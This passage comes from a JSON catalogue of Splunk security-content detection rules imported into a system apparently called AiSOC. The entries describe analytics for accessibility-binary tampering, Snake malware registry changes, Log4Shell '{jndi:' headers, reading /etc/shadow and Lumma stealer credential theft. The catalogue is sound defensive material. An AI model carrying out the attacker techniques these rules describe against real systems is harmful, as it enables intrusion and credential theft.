"detections/endpoint/mimikatz_passtheticket_commandline_parameters.yml" } }, { "id": "splunk-security-content-13c2f6c3-10c5-4deb-9ba1-7c4460ebe4ae", "type": "detection", "name": "Overwriting Accessibility Binaries", "description": "The following analytic detects modifications to Windows accessibility binaries such as sethc.exe, utilman.exe, osk.exe, Magnify.exe, Narrator.exe, DisplaySwitch.exe, and AtBroker.exe. It leverages filesystem activity data from the Endpoint.Filesystem data model to identify changes to these specific files. This activity is significant because adversaries can exploit these binaries to gain unauthorized access or execute commands without logging in. If confirmed malicious, this could allow attackers to bypass authentication mechanisms, potentially leading to unauthorized system access and further compromise of the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/overwriting-accessibility-binaries.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "13c2f6c3-10c5-4deb-9ba1-7c4460ebe4ae", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/overwriting_accessibility_binaries.yml" } }, { "id": "splunk-security-content-13cf8b79-805d-443c-bf52-f55bd7610dfd", "type": "detection", "name": "Windows Snake Malware Registry Modification wav OpenWithProgIds", "description": "The following analytic identifies modifications to the registry path .wav\\\\OpenWithProgIds, associated with the Snake Malware campaign. It leverages data from the Endpoint.Registry datamodel to detect changes in this specific registry location. This activity is significant because Snake's WerFault.exe uses this registry path to decrypt an encrypted blob containing critical components like the AES key, IV, and paths for its kernel driver and loader. If confirmed malicious, this could allow the attacker to load and execute Snake's kernel driver, leading to potential system compromise and persistent access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-snake-malware-registry-modification-wav-openwithprogids.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "13cf8b79-805d-443c-bf52-f55bd7610dfd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_snake_malware_registry_modification_wav_openwithprogids.yml" } }, { "id": "splunk-security-content-13f081d6-7052-428a-bbb0-892c79ca7c65", "type": "detection", "name": "Kubernetes newly seen TCP edge", "description": "The following analytic identifies newly seen TCP communication between source and destination workload pairs within a Kubernetes cluster. It leverages Network Performance Monitoring metrics collected via an OTEL collector and pulled from Splunk Observability Cloud. The detection compares network activity over the last hour with the past 30 days to spot new inter-workload communications. This is significant as new connections can indicate changes in application behavior or potential security threats. If malicious, unauthorized connections could lead to data breaches, privilege escalation, lateral movement, or disruption of critical services, compromising the application's integrity, availability, and confidentiality.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-newly-seen-tcp-edge.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "13f081d6-7052-428a-bbb0-892c79ca7c65", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_newly_seen_tcp_edge.yml" } }, { "id": "splunk-security-content-1400624a-d42d-484d-8843-e6753e6e3645", "type": "detection", "name": "Detect Computer Changed with Anonymous Account", "description": "The following analytic detects changes to computer accounts using an anonymous logon.\nIt leverages Windows Security Event Codes 4742 (Computer Change) with a SubjectUserName of a value \"ANONYMOUS LOGON\".\nThis activity can be significant because anonymous logons should not typically be modifying computer accounts, indicating potential unauthorized access or misconfiguration.\nIf confirmed malicious, this could allow an attacker to alter computer accounts, potentially leading to privilege escalation or persistent access within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1210" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-computer-changed-with-anonymous-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1400624a-d42d-484d-8843-e6753e6e3645", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_computer_changed_with_anonymous_account.yml" } }, { "id": "splunk-security-content-140504ae-5fe2-4d65-b2bc-a211813fbca6", "type": "detection", "name": "Okta ThreatInsight Threat Detected", "description": "The following analytic identifies threats detected by Okta ThreatInsight, such as password spraying, login failures, and high counts of unknown user login attempts. It leverages Okta Identity Management logs, specifically focusing on security.threat.detected events. This activity is significant for a SOC as it highlights potential unauthorized access attempts and credential-based attacks. If confirmed malicious, these activities could lead to unauthorized access, data breaches, and further exploitation of compromised accounts, posing a significant risk to the organization's security posture.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-threatinsight-threat-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "140504ae-5fe2-4d65-b2bc-a211813fbca6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_threatinsight_threat_detected.yml" } }, { "id": "splunk-security-content-141e7fca-a9f0-40fd-a539-9aac8be41f1b", "type": "detection", "name": "Windows Odbcconf Load DLL", "description": "The following analytic detects the execution of odbcconf.exe with the regsvr action to load a DLL. This is identified by monitoring command-line arguments in process creation logs from Endpoint Detection and Response (EDR) agents. This activity is significant as it may indicate an attempt to execute arbitrary code via DLL loading, a common technique used in various attack vectors. If confirmed malicious, this could allow an attacker to execute code with the privileges of the odbcconf.exe process, potentially leading to system compromise or further lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-odbcconf-load-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "141e7fca-a9f0-40fd-a539-9aac8be41f1b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_odbcconf_load_dll.yml" } }, { "id": "splunk-security-content-1435475e-2128-4417-a34f-59770733b0d5", "type": "detection", "name": "O365 Mailbox Folder Read Permission Assigned", "description": "The following analytic identifies instances where read permissions are assigned to mailbox folders within an Office 365 environment. It leverages the `o365_management_activity` data source, specifically monitoring the `ModifyFolderPermissions` and `AddFolderPermissions` operations, while excluding Calendar, Contacts, and PersonMetadata objects. This activity is significant as unauthorized read permissions can lead to data exposure and potential information leakage. If confirmed malicious, an attacker could gain unauthorized access to sensitive emails, leading to data breaches and compromising the confidentiality of organizational communications.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-mailbox-folder-read-permission-assigned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1435475e-2128-4417-a34f-59770733b0d5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_mailbox_folder_read_permission_assigned.yml" } }, { "id": "splunk-security-content-1474459a-302b-4255-8add-d82f96d14cd9", "type": "detection", "name": "Linux Auditd Setuid Using Setcap Utility", "description": "The following analytic detects the execution of the 'setcap' utility to enable the SUID bit on Linux systems. It leverages Linux Auditd data, focusing on process names and command-line arguments that indicate the use of 'setcap' with specific capabilities. This activity is significant because setting the SUID bit allows a user to temporarily gain root access, posing a substantial security risk. If confirmed malicious, an attacker could escalate privileges, execute arbitrary commands with elevated permissions, and potentially compromise the entire system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-setuid-using-setcap-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1474459a-302b-4255-8add-d82f96d14cd9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_setuid_using_setcap_utility.yml" } }, { "id": "splunk-security-content-1490f224-ad8b-11eb-8c4f-acde48001122", "type": "detection", "name": "Disable Windows App Hotkeys", "description": "The following analytic detects a suspicious registry modification aimed at disabling Windows hotkeys for native applications. It leverages data from the Endpoint.Registry data model, focusing on specific registry paths and values indicative of this behavior. This activity is significant as it can impair an analyst's ability to use essential tools like Task Manager and Command Prompt, hindering incident response efforts. If confirmed malicious, this technique can allow an attacker to maintain persistence and evade detection, complicating the remediation process.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disable-windows-app-hotkeys.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1490f224-ad8b-11eb-8c4f-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disable_windows_app_hotkeys.yml" } }, { "id": "splunk-security-content-14e008e5-6723-4298-b0d4-e95b24e10c18", "type": "detection", "name": "Windows Audit Policy Disabled via Auditpol", "description": "The following analytic identifies the execution of `auditpol.exe` with the \"/set\" command-line argument in order to disable a specific category or sub-category from the audit policy. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity can be significant as it indicates potential defense evasion by adversaries or Red Teams, aiming to limit data that can be leveraged for detections and audits. If confirmed malicious, this behavior could allow attackers to bypass defenses, and plan further attacks, potentially leading to full machine compromise or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-audit-policy-disabled-via-auditpol.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "14e008e5-6723-4298-b0d4-e95b24e10c18", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_audit_policy_disabled_via_auditpol.yml" } }, { "id": "splunk-security-content-14e3a089-cc23-4f4d-a770-26e44a31fbac", "type": "detection", "name": "Windows BitLockerToGo with Network Activity", "description": "The following analytic detects suspicious usage of BitLockerToGo.exe, which has been observed being abused by Lumma stealer malware. The malware leverages this legitimate Windows utility to manipulate registry keys, search for cryptocurrency wallets and credentials, and exfiltrate sensitive data. This activity is significant because BitLockerToGo.exe provides functionality for viewing, copying, and writing files as well as modifying registry branches - capabilities that the Lumma stealer exploits for malicious purposes. If confirmed malicious, this could indicate an active data theft campaign targeting cryptocurrency wallets, browser credentials, and password manager archives. The detection focuses on identifying BitLockerToGo.exe execution patterns that deviate from normal system behavior.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-bitlockertogo-with-network-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "14e3a089-cc23-4f4d-a770-26e44a31fbac", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_bitlockertogo_with_network_activity.yml" } }, { "id": "splunk-security-content-14f414cf-3080-4b9b-aaf6-55a4ce947b93", "type": "detection", "name": "Windows Unusual Count Of Users Fail To Auth Wth ExplicitCredentials", "description": "The following analytic identifies a source user failing to authenticate with multiple users using explicit credentials on a host. It leverages Windows Event Code 4648 and calculates the standard deviation for each host, using the 3-sigma rule to detect anomalies. This behavior is significant as it may indicate a Password Spraying attack, where an adversary attempts to gain initial access or elevate privileges. If confirmed malicious, this activity could lead to unauthorized access, privilege escalation, or further compromise of the Active Directory environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unusual-count-of-users-fail-to-auth-wth-explicitcredentials.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "14f414cf-3080-4b9b-aaf6-55a4ce947b93", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unusual_count_of_users_fail_to_auth_wth_explicitcredentials.yml" } }, { "id": "splunk-security-content-1522145a-8e86-4f83-89a8-baf62a8f489d", "type": "detection", "name": "Windows Modify Registry on Smart Card Group Policy", "description": "This analytic is developed to detect suspicious registry modifications targeting the \"scforceoption\" key. Altering this key enforces smart card login for all users, potentially disrupting normal access methods. Unauthorized changes to this setting could indicate an attempt to restrict access or force a specific authentication method, possibly signifying malicious intent to manipulate system security protocols.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-on-smart-card-group-policy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1522145a-8e86-4f83-89a8-baf62a8f489d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_on_smart_card_group_policy.yml" } }, { "id": "splunk-security-content-15603165-147d-4a6e-9778-bd0ff39e668f", "type": "detection", "name": "Windows Unusual Count Of Invalid Users Failed To Auth Using NTLM", "description": "The following analytic identifies a source endpoint failing to authenticate with multiple invalid users using the NTLM protocol. It leverages EventCode 4776 and calculates the standard deviation for each host, using the 3-sigma rule to detect anomalies. This behavior is significant as it may indicate a Password Spraying attack, where an adversary attempts to gain initial access or elevate privileges. If confirmed malicious, this activity could lead to unauthorized access or privilege escalation, posing a significant threat to the Active Directory environment. This detection is focused on domain controllers.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unusual-count-of-invalid-users-failed-to-auth-using-ntlm.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "15603165-147d-4a6e-9778-bd0ff39e668f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unusual_count_of_invalid_users_failed_to_auth_using_ntlm.yml" } }, { "id": "splunk-security-content-15838756-f425-43fa-9d88-a7f88063e81a", "type": "detection", "name": "Access to Vulnerable Ivanti Connect Secure Bookmark Endpoint", "description": "The following analytic identifies access to the /api/v1/configuration/users/user-roles/user-role/rest-userrole1/web/web-bookmarks/bookmark endpoint, which is associated with CVE-2023-46805 and CVE-2024-21887 vulnerabilities. It detects this activity by monitoring for GET requests that receive a 403 Forbidden response with an empty body. This behavior is significant as it indicates potential exploitation attempts against Ivanti Connect Secure systems. If confirmed malicious, attackers could exploit these vulnerabilities to gain unauthorized access or control over the affected systems, leading to potential data breaches or system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/access-to-vulnerable-ivanti-connect-secure-bookmark-endpoint.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "15838756-f425-43fa-9d88-a7f88063e81a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/access_to_vulnerable_ivanti_connect_secure_bookmark_endpoint.yml" } }, { "id": "splunk-security-content-158b68fa-5d1a-11ec-aac8-acde48001122", "type": "detection", "name": "Hunting for Log4Shell", "description": "The following analytic detects potential exploitation attempts of the Log4Shell vulnerability (CVE-2021-44228) by analyzing HTTP headers for specific patterns. It leverages the Web Datamodel and evaluates various indicators such as the presence of `{jndi:`, environment variables, and common URI paths. This detection is significant as Log4Shell allows remote code execution, posing a severe threat to systems. If confirmed malicious, attackers could gain unauthorized access, execute arbitrary code, and potentially compromise sensitive data, leading to extensive damage and data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/hunting-for-log4shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "158b68fa-5d1a-11ec-aac8-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/hunting_for_log4shell.yml" } }, { "id": "splunk-security-content-15b0694e-caa2-4009-8d83-a1f98b86d086", "type": "detection", "name": "PingID Mismatch Auth Source and Verification Response", "description": "The following analytic identifies discrepancies between the IP address of an authentication event and the IP address of the verification response event, focusing on differences in the originating countries. It leverages JSON logs from PingID, comparing the 'auth_Country' and 'verify_Country' fields. This activity is significant as it may indicate suspicious sign-in behavior, such as account compromise or unauthorized access attempts. If confirmed malicious, this could allow attackers to bypass authentication mechanisms, potentially leading to unauthorized access to sensitive systems and data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1621", "T1556.006", "T1098.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/pingid-mismatch-auth-source-and-verification-response.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "15b0694e-caa2-4009-8d83-a1f98b86d086", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/pingid_mismatch_auth_source_and_verification_response.yml" } }, { "id": "splunk-security-content-15d905f6-da6b-11eb-ab82-acde48001122", "type": "detection", "name": "Spoolsv Spawning Rundll32", "description": "The following analytic detects the spawning of `rundll32.exe` without command-line arguments by `spoolsv.exe`, which is unusual and potentially indicative of exploitation attempts like CVE-2021-34527 (PrintNightmare). This detection leverages Endpoint Detection and Response (EDR) telemetry, focusing on process creation events where `spoolsv.exe` is the parent process. This activity is significant as `spoolsv.exe` typically does not spawn other processes, and such behavior could indicate an active exploitation attempt. If confirmed malicious, this could allow an attacker to execute arbitrary code, escalate privileges, or maintain persistence on the compromised endpoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/spoolsv-spawning-rundll32.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "15d905f6-da6b-11eb-ab82-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/spoolsv_spawning_rundll32.yml" } }, { "id": "splunk-security-content-15e70689-f55b-489e-8a80-6d0cd6d8aad2", "type": "detection", "name": "Windows Deleted Registry By A Non Critical Process File Path", "description": "The following analytic detects the deletion of registry keys by non-critical processes. It leverages Endpoint Detection and Response (EDR) data, focusing on registry deletion events and correlating them with processes not typically associated with system or program files. This activity is significant as it may indicate malware, such as the Double Zero wiper, attempting to evade defenses or cause destructive payload impacts. If confirmed malicious, this behavior could lead to significant system damage, loss of critical configurations, and potential disruption of services.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-deleted-registry-by-a-non-critical-process-file-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "15e70689-f55b-489e-8a80-6d0cd6d8aad2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_deleted_registry_by_a_non_critical_process_file_path.yml" } }, { "id": "splunk-security-content-15e79d0a-c659-42fd-9668-94108528f2ec", "type": "detection", "name": "ESXi Shell Access Enabled", "description": "This detection identifies when the ESXi Shell is enabled on a host, which may indicate that a malicious actor is preparing to execute commands locally or establish persistent access. Enabling the shell outside of approved maintenance windows can be a sign of compromise or unauthorized administrative activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-shell-access-enabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "15e79d0a-c659-42fd-9668-94108528f2ec", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_shell_access_enabled.yml" } }, { "id": "splunk-security-content-1606cc5b-fd5f-4865-9fe3-0ed1eaec2df6", "type": "detection", "name": "HTTP Duplicated Header", "description": "Detects when a request has more than one of the same header. This is commonly used in request smuggling and other web based attacks. HTTP Request Smuggling exploits inconsistencies in how front-end and back-end servers parse HTTP requests by using ambiguous or malformed headers to hide malicious requests within legitimate ones. Attackers leverage duplicate headers, particularly Content-Length and Transfer-Encoding, to cause different servers in the chain to disagree on where one request ends and another begins. RFC7230 states that a sender MUST NOT generate multiple header fields with the same field name in a message unless either the entire field value for that header field is defined as a comma-separated list or the header field is a well-known exception.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001", "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/http-duplicated-header.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1606cc5b-fd5f-4865-9fe3-0ed1eaec2df6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/http_duplicated_header.yml" } }, { "id": "splunk-security-content-16107e0e-71fc-11ec-b862-acde48001122", "type": "detection", "name": "Linux Possible Access To Credential Files", "description": "The following analytic detects attempts to access or dump the contents of /etc/passwd and /etc/shadow files on Linux systems. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on processes like 'cat', 'nano', 'vim', and 'vi' accessing these files. This activity is significant as it may indicate credential dumping, a technique used by adversaries to gain persistence or escalate privileges. If confirmed malicious, attackers could obtain hashed passwords for offline cracking, leading to unauthorized access and potential system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-possible-access-to-credential-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "16107e0e-71fc-11ec-b862-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_possible_access_to_credential_files.yml" } }, { "id": "splunk-security-content-16132445-da9f-4d03-ad44-56d717dcd67d", "type": "detection", "name": "Windows AD Self DACL Assignment", "description": "Detect when a user creates a new DACL in AD for their own AD object.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484", "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-self-dacl-assignment.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "16132445-da9f-4d03-ad44-56d717dcd67d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_self_dacl_assignment.yml" } }, { "id": "splunk-security-content-161bc0ca-4651-4c13-9c27-27770660cf67", "type": "detection", "name": "Risk Rule for Dev Sec Ops by Repository", "description": "The following analytic identifies high-risk activities within repositories by correlating repository data with risk scores. It leverages findings and intermediate findings created by detections from the Dev Sec Ops analytic stories, summing risk scores and capturing source and user information. The detection focuses on high-risk scores above 100 and sources with more than three occurrences. This activity is significant as it highlights repositories frequently targeted by threats, providing insights into potential vulnerabilities. If confirmed malicious, attackers could exploit these repositories, leading to data breaches or infrastructure compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/risk-rule-for-dev-sec-ops-by-repository.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "161bc0ca-4651-4c13-9c27-27770660cf67", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/risk_rule_for_dev_sec_ops_by_repository.yml" } }, { "id": "splunk-security-content-1631ac2d-f2a9-42fa-8a59-d6e210d472f5", "type": "detection", "name": "Windows Findstr GPP Discovery", "description": "The following analytic detects the use of the findstr command to search for unsecured credentials in Group Policy 